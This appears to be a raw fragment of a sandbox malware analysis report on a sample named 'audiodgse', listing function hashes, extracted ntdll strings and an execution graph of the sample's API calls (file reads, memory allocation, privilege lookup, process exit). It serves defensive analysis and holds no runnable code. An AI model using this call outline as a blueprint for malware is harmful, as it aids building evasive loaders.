                                                                                • Opcode Fuzzy Hash: 2f5f37c5002c4d156f8a115e390e4d9467d85d590b062d12e329faaacfbd4772
                                                                                • Instruction Fuzzy Hash: 1D90023521140402D51071585C44686004A97D0341F55D411A1465558DC65489A1A621
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                • Instruction ID: 0a4f4174614f6b841ff7e8650d075c932cd1145fb45d53304f57950252844b83
                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: c13c9539635b4cc647c72dd6d503dd5a892f9d711552626dff7df7347434affc
                                                                                • Instruction ID: 18f7ac8b84b61e414ebf8dc533851a0fba24d96abb1ff92076d51d0cb787701e
                                                                                • Opcode Fuzzy Hash: c13c9539635b4cc647c72dd6d503dd5a892f9d711552626dff7df7347434affc
                                                                                • Instruction Fuzzy Hash: 5351E5B2A20117AFCB11DB9CC9C097EFBB8BB48740B948229F565D7641D374DE0087A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 906b9817f1a1e91fe31405e933d4b87cff93664a76a20a84e89b822b685a4629
                                                                                • Instruction ID: ee29b26d767730ec264058df4b3a3882c10a2a28a73cf57acfcc4893ea95b8d2
                                                                                • Opcode Fuzzy Hash: 906b9817f1a1e91fe31405e933d4b87cff93664a76a20a84e89b822b685a4629
                                                                                • Instruction Fuzzy Hash: FB512771A00645AECB39DF9CC8D087FFBF8EF44304B248459E496D7646EA74DA40C760
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012D46FC
                                                                                • Execute=1, xrefs: 012D4713
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 012D4787
                                                                                • ExecuteOptions, xrefs: 012D46A0
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 012D4725
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 012D4655
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 012D4742
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 0-484625025
                                                                                • Opcode ID: e440772194711824ad702d1fe4fa8460dd20f3ee6a3ef9b704fca88c68903bd3
                                                                                • Instruction ID: 2045b5be44d1b95c8fef38778468cfe9fdac249613bec6801cf5fb9901efd6fa
                                                                                • Opcode Fuzzy Hash: e440772194711824ad702d1fe4fa8460dd20f3ee6a3ef9b704fca88c68903bd3
                                                                                • Instruction Fuzzy Hash: 5E51293167021ABFEF14AEACDC85FFD77A8AF54304F4400A9D605AB191E7709A418F90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                • Instruction ID: c3f4e8ebd0d82ddfb8730cf6291842e5b54a51c3cdbba98af82d5098c944a503
                                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                • Instruction Fuzzy Hash: 180238B1508342AFD309CF19C590A6FBBE5EFC4708F448A2DF9994B260DB31EA05CB56
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction ID: d2236d7463839815b8bb3b9898cc52eff3e85672df0e5173d38bf8861d43ee2c
                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction Fuzzy Hash: DF81E231E2524A8FEF29CF6CC8917FEBFB1AF45720F984259DA61A7291C7708840CB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$[$]:%u
                                                                                • API String ID: 48624451-2819853543
                                                                                • Opcode ID: 74bffe2a51f293e46abefea15f4cdc5c1bbedebc38baed15a7d6dec5696eac8c
                                                                                • Instruction ID: 87cebf3b3e6227ada60b6c9a8a2796164e6ef747354a26c2bd52037d76a648d2
                                                                                • Opcode Fuzzy Hash: 74bffe2a51f293e46abefea15f4cdc5c1bbedebc38baed15a7d6dec5696eac8c
                                                                                • Instruction Fuzzy Hash: 0F21517AE10119ABDB15DF69CC40AFFBBF9AF54754F540126E905E3205E730DA018BA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 012D031E
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012D02E7
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012D02BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                • API String ID: 0-2474120054
                                                                                • Opcode ID: e4bd0b6630932e6887f7dd0eac57ee9c04300973cfdf5040e10572eae0e08e59
                                                                                • Instruction ID: c43111dfd8f3a0920e559419b427925d2613899ea536fa1e53cc83de19dfde8e
                                                                                • Opcode Fuzzy Hash: e4bd0b6630932e6887f7dd0eac57ee9c04300973cfdf5040e10572eae0e08e59
                                                                                • Instruction Fuzzy Hash: 23E1BF30625742DFE725EF28C985B2ABBE0BB88714F140A1DF6A5CB2E1D774D844CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 012D7BAC
                                                                                • RTL: Resource at %p, xrefs: 012D7B8E
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 012D7B7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 0-871070163
                                                                                • Opcode ID: 84b841e30619de4486a6a577c107ddab680e95f9e65c377df34170d0c2d35980
                                                                                • Instruction ID: 90e7de1ada1a848fe2941fb048008c7883c751edd2593ea9fcba4a886d17e59f
                                                                                • Opcode Fuzzy Hash: 84b841e30619de4486a6a577c107ddab680e95f9e65c377df34170d0c2d35980
                                                                                • Instruction Fuzzy Hash: E241E3353207039FDB25DE2DD841F6AB7E5EF98710F100A2DFA5A9B680DB71E8058B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012D728C
                                                                                Strings
                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 012D7294
                                                                                • RTL: Re-Waiting, xrefs: 012D72C1
                                                                                • RTL: Resource at %p, xrefs: 012D72A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-605551621
                                                                                • Opcode ID: 3a5736caba91953578a657473219100150cb9486451aaba8a0b2e661ec7483e0
                                                                                • Instruction ID: 40ce60f8f81b1bcc0097b2d58aef2cdaae972e37f07113b762d193db758e4899
                                                                                • Opcode Fuzzy Hash: 3a5736caba91953578a657473219100150cb9486451aaba8a0b2e661ec7483e0
                                                                                • Instruction Fuzzy Hash: 21410231720243ABDB21DE29CC46F6AB7A5FF94714F100619FE55AB240DB25F84287D1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 9dcbb2cff774d79f913a7b6be5891e86af022c9e145f6cda8f549ff39edffc21
                                                                                • Instruction ID: 2951bef124f4616687db83b1de21cdfd4b3e3f77f8a8322379c1c5b1addc5e7a
                                                                                • Opcode Fuzzy Hash: 9dcbb2cff774d79f913a7b6be5891e86af022c9e145f6cda8f549ff39edffc21
                                                                                • Instruction Fuzzy Hash: 8331A272A102199FDB24DE2DCC40BEFB7B8EB04754F94045AE849E3204EB30EA548BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction ID: 05c817ef4d2128881e908bc6e331d1b7f100cf819d17c85dd3abe158287495a6
                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction Fuzzy Hash: 5A91D570E202079BEF24DF6DC8816BEBBB9AF44320F94451AEB55E72C0D7328A408759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$@
                                                                                • API String ID: 0-1194432280
                                                                                • Opcode ID: 0f94c814cc604446b94718de545a88b56a0323d54485a809bc0d57a95a2341cf
                                                                                • Instruction ID: c77e8574062d951ff115a082a83027becbe91b8e96b7d5fe825e09e06559c729
                                                                                • Opcode Fuzzy Hash: 0f94c814cc604446b94718de545a88b56a0323d54485a809bc0d57a95a2341cf
                                                                                • Instruction Fuzzy Hash: A4811B71D1026ADFDB35DB54CC45BEEB6B8AB08754F1041DAEA19B7280EB705E84CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:1.8%
                                                                                Dynamic/Decrypted Code Coverage:8.3%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:591
                                                                                Total number of Limit Nodes:73
                                                                                execution_graph 80847 41f0e0 80848 41f0eb 80847->80848 80850 41b930 80847->80850 80851 41b956 80850->80851 80858 409d30 80851->80858 80853 41b962 80857 41b983 80853->80857 80866 40c1b0 80853->80866 80855 41b975 80902 41a670 80855->80902 80857->80848 80905 409c80 80858->80905 80860 409d3d 80861 409d44 80860->80861 80917 409c20 80860->80917 80861->80853 80867 40c1d5 80866->80867 81339 40b1b0 80867->81339 80869 40c22c 81343 40ae30 80869->81343 80871 40c4a3 80871->80855 80872 40c252 80872->80871 81352 414390 80872->81352 80874 40c297 80874->80871 81355 408a60 80874->81355 80876 40c2db 80876->80871 81362 41a4c0 80876->81362 80880 40c331 80881 40c338 80880->80881 81374 419fd0 80880->81374 80882 41bd80 2 API calls 80881->80882 80884 40c345 80882->80884 80884->80855 80886 40c382 80887 41bd80 2 API calls 80886->80887 80888 40c389 80887->80888 80888->80855 80889 40c392 80890 40f490 3 API calls 80889->80890 80891 40c406 80890->80891 80891->80881 80892 40c411 80891->80892 80893 41bd80 2 API calls 80892->80893 80894 40c435 80893->80894 81379 41a020 80894->81379 80897 419fd0 2 API calls 80898 40c470 80897->80898 80898->80871 81384 419de0 80898->81384 80901 41a670 2 API calls 80901->80871 80903 41af20 LdrLoadDll 80902->80903 80904 41a68f ExitProcess 80903->80904 80904->80857 80906 409c93 80905->80906 80956 418b80 LdrLoadDll 80905->80956 80936 418a30 80906->80936 80909 409ca6 80909->80860 80910 409c9c 80910->80909 80939 41b270 80910->80939 80912 409ce3 80912->80909 80950 409aa0 80912->80950 80914 409d03 80957 409620 LdrLoadDll 80914->80957 80916 409d15 80916->80860 81313 41b560 80917->81313 80920 41b560 LdrLoadDll 80921 409c4b 80920->80921 80922 41b560 LdrLoadDll 80921->80922 80923 409c61 80922->80923 80924 40f170 80923->80924 80925 40f189 80924->80925 81321 40b030 80925->81321 80927 40f19c 81325 41a1a0 80927->81325 80931 40f1ed 80933 41a450 2 API calls 80931->80933 80932 40f1c2 80932->80931 81331 41a220 80932->81331 80935 409d55 80933->80935 80935->80853 80958 41a5c0 80936->80958 80940 41b289 80939->80940 80971 414a40 80940->80971 80942 41b2a1 80943 41b2aa 80942->80943 81010 41b0b0 80942->81010 80943->80912 80945 41b2be 80945->80943 81028 419ec0 80945->81028 81291 407ea0 80950->81291 80952 409ac1 80952->80914 80953 409aba 80953->80952 81304 408160 80953->81304 80956->80906 80957->80916 80961 41af20 80958->80961 80960 418a45 80960->80910 80962 41af30 80961->80962 80963 41af52 80961->80963 80965 414e40 80962->80965 80963->80960 80966 414e5a 80965->80966 80967 414e4e 80965->80967 80966->80963 80967->80966 80970 4152c0 LdrLoadDll 80967->80970 80969 414fac 80969->80963 80970->80969 80972 414d75 80971->80972 80973 414a54 80971->80973 80972->80942 80973->80972 81037 419c10 80973->81037 80976 414b80 81041 41a320 80976->81041 80977 414b63 81098 41a420 LdrLoadDll 80977->81098 80980 414b6d 80980->80942 80981 414ba7 80982 41bd80 2 API calls 80981->80982 80984 414bb3 80982->80984 80983 414d39 80986 41a450 2 API calls 80983->80986 80984->80980 80984->80983 80985 414d4f 80984->80985 80990 414c42 80984->80990 81107 414780 LdrLoadDll NtReadFile NtClose 80985->81107 80987 414d40 80986->80987 80987->80942 80989 414d62 80989->80942 80991 414ca9 80990->80991 80993 414c51 80990->80993 80991->80983 80992 414cbc 80991->80992 81100 41a2a0 80992->81100 80995 414c56 80993->80995 80996 414c6a 80993->80996 81099 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80995->81099 80997 414c87 80996->80997 80998 414c6f 80996->80998 80997->80987 81056 414400 80997->81056 81044 4146e0 80998->81044 81001 414c60 81001->80942 81004 414c7d 81004->80942 81006 414d1c 81104 41a450 81006->81104 81008 414c9f 81008->80942 81009 414d28 81009->80942 81011 41b0c1 81010->81011 81012 41b0d3 81011->81012 81126 41bd00 81011->81126 81012->80945 81014 41b0f4 81129 414060 81014->81129 81016 41b140 81016->80945 81017 41b117 81017->81016 81018 414060 3 API calls 81017->81018 81020 41b139 81018->81020 81020->81016 81161 415380 81020->81161 81021 41b1ca 81022 41b1da 81021->81022 81256 41aec0 LdrLoadDll 81021->81256 81171 41ad30 81022->81171 81025 41b208 81251 419e80 81025->81251 81029 41af20 LdrLoadDll 81028->81029 81030 419edc 81029->81030 81284 1b62c1d LdrInitializeThunk 81030->81284 81285 1b62c0a 81030->81285 81031 419ef7 81034 41bd80 81031->81034 81288 41a630 81034->81288 81036 41b319 81036->80912 81038 419c1c 81037->81038 81039 41af20 LdrLoadDll 81038->81039 81040 414b34 81039->81040 81040->80976 81040->80977 81040->80980 81042 41a33c NtCreateFile 81041->81042 81043 41af20 LdrLoadDll 81041->81043 81042->80981 81043->81042 81045 4146fc 81044->81045 81046 41a2a0 LdrLoadDll 81045->81046 81047 41471d 81046->81047 81048 414724 81047->81048 81049 414738 81047->81049 81050 41a450 2 API calls 81048->81050 81051 41a450 2 API calls 81049->81051 81052 41472d 81050->81052 81053 414741 81051->81053 81052->81004 81108 41bf90 LdrLoadDll RtlAllocateHeap 81053->81108 81055 41474c 81055->81004 81057 41444b 81056->81057 81058 41447e 81056->81058 81059 41a2a0 LdrLoadDll 81057->81059 81060 4145c9 81058->81060 81064 41449a 81058->81064 81061 414466 81059->81061 81062 41a2a0 LdrLoadDll 81060->81062 81063 41a450 2 API calls 81061->81063 81070 4145e4 81062->81070 81065 41446f 81063->81065 81066 41a2a0 LdrLoadDll 81064->81066 81065->81008 81067 4144b5 81066->81067 81068 4144d1 81067->81068 81069 4144bc 81067->81069 81074 4144d6 81068->81074 81075 4144ec 81068->81075 81073 41a450 2 API calls 81069->81073 81121 41a2e0 LdrLoadDll 81070->81121 81072 41461e 81076 41a450 2 API calls 81072->81076 81077 4144c5 81073->81077 81078 41a450 2 API calls 81074->81078 81084 4144f1 81075->81084 81109 41bf50 81075->81109 81079 414629 81076->81079 81077->81008 81080 4144df 81078->81080 81079->81008 81080->81008 81083 414557 81085 41456e 81083->81085 81120 41a260 LdrLoadDll 81083->81120 81091 414503 81084->81091 81112 41a3d0 81084->81112 81087 414575 81085->81087 81088 41458a 81085->81088 81089 41a450 2 API calls 81087->81089 81090 41a450 2 API calls 81088->81090 81089->81091 81092 414593 81090->81092 81091->81008 81093 4145bf 81092->81093 81115 41bb50 81092->81115 81093->81008 81095 4145aa 81096 41bd80 2 API calls 81095->81096 81097 4145b3 81096->81097 81097->81008 81098->80980 81099->81001 81101 41af20 LdrLoadDll 81100->81101 81102 414d04 81100->81102 81101->81102 81103 41a2e0 LdrLoadDll 81102->81103 81103->81006 81105 41a46c NtClose 81104->81105 81106 41af20 LdrLoadDll 81104->81106 81105->81009 81106->81105 81107->80989 81108->81055 81122 41a5f0 81109->81122 81111 41bf68 81111->81084 81113 41af20 LdrLoadDll 81112->81113 81114 41a3ec NtReadFile 81113->81114 81114->81083 81116 41bb74 81115->81116 81117 41bb5d 81115->81117 81116->81095 81117->81116 81118 41bf50 2 API calls 81117->81118 81119 41bb8b 81118->81119 81119->81095 81120->81085 81121->81072 81123 41a605 81122->81123 81124 41af20 LdrLoadDll 81123->81124 81125 41a60c RtlAllocateHeap 81124->81125 81125->81111 81257 41a500 81126->81257 81128 41bd2d 81128->81014 81130 414071 81129->81130 81131 414079 81129->81131 81130->81017 81132 41434c 81131->81132 81260 41cef0 81131->81260 81132->81017 81134 4140cd 81135 41cef0 2 API calls 81134->81135 81138 4140d8 81135->81138 81136 414126 81139 41cef0 2 API calls 81136->81139 81138->81136 81140 41d020 3 API calls 81138->81140 81271 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 81138->81271 81142 41413a 81139->81142 81140->81138 81141 414197 81143 41cef0 2 API calls 81141->81143 81142->81141 81265 41d020 81142->81265 81144 4141ad 81143->81144 81146 4141ea 81144->81146 81148 41d020 3 API calls 81144->81148 81147 41cef0 2 API calls 81146->81147 81149 4141f5 81147->81149 81148->81144 81150 41d020 3 API calls 81149->81150 81157 41422f 81149->81157 81150->81149 81152 414324 81273 41cf50 LdrLoadDll RtlFreeHeap 81152->81273 81154 41432e 81274 41cf50 LdrLoadDll RtlFreeHeap 81154->81274 81156 414338 81275 41cf50 LdrLoadDll RtlFreeHeap 81156->81275 81272 41cf50 LdrLoadDll RtlFreeHeap 81157->81272 81159 414342 81276 41cf50 LdrLoadDll RtlFreeHeap 81159->81276 81162 415391 81161->81162 81163 414a40 8 API calls 81162->81163 81164 4153a7 81163->81164 81165 4153e2 81164->81165 81166 4153f5 81164->81166 81169 4153fa 81164->81169 81168 41bd80 2 API calls 81165->81168 81167 41bd80 2 API calls 81166->81167 81167->81169 81170 4153e7 81168->81170 81169->81021 81170->81021 81172 41ad3d 81171->81172 81277 41abf0 81172->81277 81175 41abf0 LdrLoadDll 81176 41ad4d 81175->81176 81177 41abf0 LdrLoadDll 81176->81177 81178 41ad56 81177->81178 81179 41abf0 LdrLoadDll 81178->81179 81180 41ad5f 81179->81180 81181 41abf0 LdrLoadDll 81180->81181 81182 41ad68 81181->81182 81183 41abf0 LdrLoadDll 81182->81183 81184 41ad71 81183->81184 81185 41abf0 LdrLoadDll 81184->81185 81186 41ad7d 81185->81186 81187 41abf0 LdrLoadDll 81186->81187 81188 41ad86 81187->81188 81189 41abf0 LdrLoadDll 81188->81189 81190 41ad8f 81189->81190 81191 41abf0 LdrLoadDll 81190->81191 81192 41ad98 81191->81192 81193 41abf0 LdrLoadDll 81192->81193 81194 41ada1 81193->81194 81195 41abf0 LdrLoadDll 81194->81195 81196 41adaa 81195->81196 81197 41abf0 LdrLoadDll 81196->81197 81198 41adb6 81197->81198 81199 41abf0 LdrLoadDll 81198->81199 81200 41adbf 81199->81200 81201 41abf0 LdrLoadDll 81200->81201 81202 41adc8 81201->81202 81203 41abf0 LdrLoadDll 81202->81203 81204 41add1 81203->81204 81205 41abf0 LdrLoadDll 81204->81205 81206 41adda 81205->81206 81207 41abf0 LdrLoadDll 81206->81207 81208 41ade3 81207->81208 81209 41abf0 LdrLoadDll 81208->81209 81210 41adef 81209->81210 81211 41abf0 LdrLoadDll 81210->81211 81212 41adf8 81211->81212 81213 41abf0 LdrLoadDll 81212->81213 81214 41ae01 81213->81214 81215 41abf0 LdrLoadDll 81214->81215 81216 41ae0a 81215->81216 81217 41abf0 LdrLoadDll 81216->81217 81218 41ae13 81217->81218 81219 41abf0 LdrLoadDll 81218->81219 81220 41ae1c 81219->81220 81221 41abf0 LdrLoadDll 81220->81221 81222 41ae28 81221->81222 81223 41abf0 LdrLoadDll 81222->81223 81224 41ae31 81223->81224 81225 41abf0 LdrLoadDll 81224->81225 81226 41ae3a 81225->81226 81227 41abf0 LdrLoadDll 81226->81227 81228 41ae43 81227->81228 81229 41abf0 LdrLoadDll 81228->81229 81230 41ae4c 81229->81230 81231 41abf0 LdrLoadDll 81230->81231 81232 41ae55 81231->81232 81233 41abf0 LdrLoadDll 81232->81233 81234 41ae61 81233->81234 81235 41abf0 LdrLoadDll 81234->81235 81236 41ae6a 81235->81236 81237 41abf0 LdrLoadDll 81236->81237 81238 41ae73 81237->81238 81239 41abf0 LdrLoadDll 81238->81239 81240 41ae7c 81239->81240 81241 41abf0 LdrLoadDll 81240->81241 81242 41ae85 81241->81242 81243 41abf0 LdrLoadDll 81242->81243 81244 41ae8e 81243->81244 81245 41abf0 LdrLoadDll 81244->81245 81246 41ae9a 81245->81246 81247 41abf0 LdrLoadDll 81246->81247 81248 41aea3 81247->81248 81249 41abf0 LdrLoadDll 81248->81249 81250 41aeac 81249->81250 81250->81025 81252 41af20 LdrLoadDll 81251->81252 81253 419e9c 81252->81253 81283 1b62df0 LdrInitializeThunk 81253->81283 81254 419eb3 81254->80945 81256->81022 81258 41a51c NtAllocateVirtualMemory 81257->81258 81259 41af20 LdrLoadDll 81257->81259 81258->81128 81259->81258 81261 41cf00 81260->81261 81262 41cf06 81260->81262 81261->81134 81263 41bf50 2 API calls 81262->81263 81264 41cf2c 81263->81264 81264->81134 81266 41cf90 81265->81266 81267 41cfed 81266->81267 81268 41bf50 2 API calls 81266->81268 81267->81142 81269 41cfca 81268->81269 81270 41bd80 2 API calls 81269->81270 81270->81267 81271->81138 81272->81152 81273->81154 81274->81156 81275->81159 81276->81132 81278 41ac0b 81277->81278 81279 414e40 LdrLoadDll 81278->81279 81280 41ac2b 81279->81280 81281 414e40 LdrLoadDll 81280->81281 81282 41acd7 81280->81282 81281->81282 81282->81175 81283->81254 81284->81031 81286 1b62c1f LdrInitializeThunk 81285->81286 81287 1b62c11 81285->81287 81286->81031 81287->81031 81289 41af20 LdrLoadDll 81288->81289 81290 41a64c RtlFreeHeap 81289->81290 81290->81036 81292 407eb0 81291->81292 81293 407eab 81291->81293 81294 41bd00 2 API calls 81292->81294 81293->80953 81303 407ed5 81294->81303 81295 407f38 81295->80953 81296 419e80 2 API calls 81296->81303 81297 407f3e 81299 407f64 81297->81299 81300 41a580 2 API calls 81297->81300 81299->80953 81302 407f55 81300->81302 81301 41bd00 2 API calls 81301->81303 81302->80953 81303->81295 81303->81296 81303->81297 81303->81301 81307 41a580 81303->81307 81305 40817e 81304->81305 81306 41a580 2 API calls 81304->81306 81305->80914 81306->81305 81308 41a59c 81307->81308 81309 41af20 LdrLoadDll 81307->81309 81312 1b62c70 LdrInitializeThunk 81308->81312 81309->81308 81310 41a5b3 81310->81303 81312->81310 81314 41b583 81313->81314 81317 40ace0 81314->81317 81318 40ace3 81317->81318 81319 40ad40 LdrLoadDll 81318->81319 81320 409c3a 81318->81320 81319->81320 81320->80920 81322 40b053 81321->81322 81324 40b0d0 81322->81324 81337 419c50 LdrLoadDll 81322->81337 81324->80927 81326 40f1ab 81325->81326 81327 41af20 LdrLoadDll 81325->81327 81326->80935 81328 41a790 81326->81328 81327->81326 81329 41a7af LookupPrivilegeValueW 81328->81329 81330 41af20 LdrLoadDll 81328->81330 81329->80932 81330->81329 81332 41a236 81331->81332 81333 41af20 LdrLoadDll 81332->81333 81334 41a23c 81333->81334 81338 1b62ea0 LdrInitializeThunk 81334->81338 81335 41a25b 81335->80931 81337->81324 81338->81335 81340 40b1e0 81339->81340 81341 40b030 LdrLoadDll 81340->81341 81342 40b1f4 81341->81342 81342->80869 81344 40ae41 81343->81344 81345 40ae3d 81343->81345 81346 40ae8c 81344->81346 81348 40ae5a 81344->81348 81345->80872 81390 419c90 